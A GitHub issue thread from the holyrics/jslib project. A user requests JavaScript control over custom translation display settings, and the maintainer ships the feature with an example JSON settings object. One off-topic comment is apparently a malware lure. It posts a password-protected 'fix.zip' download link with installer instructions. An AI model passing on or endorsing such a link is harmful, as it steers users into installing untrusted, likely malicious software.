### ISSUE TITLE
Please add a way to set custom translation via Javascript

### ISSUE THREAD

**Issue by tsuki-tsuki** [holyrics/jslib#11]
Right now, [SetDisplaySettings](https://github.com/holyrics/jslib/blob/main/README-en.md#hlysetdisplaysettings-input) method is capable of setting slide translation, but only changing between single translation and custom.
Please add a way to set the contents of custom translation via Javascript, too.

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by holyrics** [comment]
The custom setting remains with the last user-defined setting.

Just setting the item to "custom" doesn't solve your need?

Do you need to change detailed settings of the "custom" option via javascript during program execution because the setting may change according to external factors?

**Comment by tsuki-tsuki** [comment]
Yes, exactly. My church have a need that requires multiple variations of custom translation to be used.
If it is hard to set it via Javascript, maybe add a feature to add another custom set in the GUI could also be helpful.

**Comment by holyrics** [comment]
Okay, I'll check for the next update that will start soon.

If you use Telegram, you can follow and test the development of new versions through the [Holyrics Beta](https://holyrics.com.br/_beta/join.html) group.

**Comment by holyrics** [comment]
The option via jslib to edit custom settings for a display settings translation is available in the current version `v2.24.0`

```h.hly('SetDisplaySettings', {...})``` [Display Settings Object](https://github.com/holyrics/jslib/blob/main/README-en.md#display-settings)

Example structure
```json
{
  "id": "public",
  ...
  "slide_translation": "custom",
  "slide_translation_custom_settings": {
    "translation_1": {
      "name": "default",
      "style": "",
      "prefix": "",
      "suffix": ""
    },
    "translation_2": {
      "name": "English",
      "style": "<size:80><i>",
      "prefix": "",
      "suffix": ""
    },
    "translation_3": null,
    "translation_4": null,
    "merge": true,
    "uppercase": false,
    "blank_line_height": 40
  },
  ...
}
```
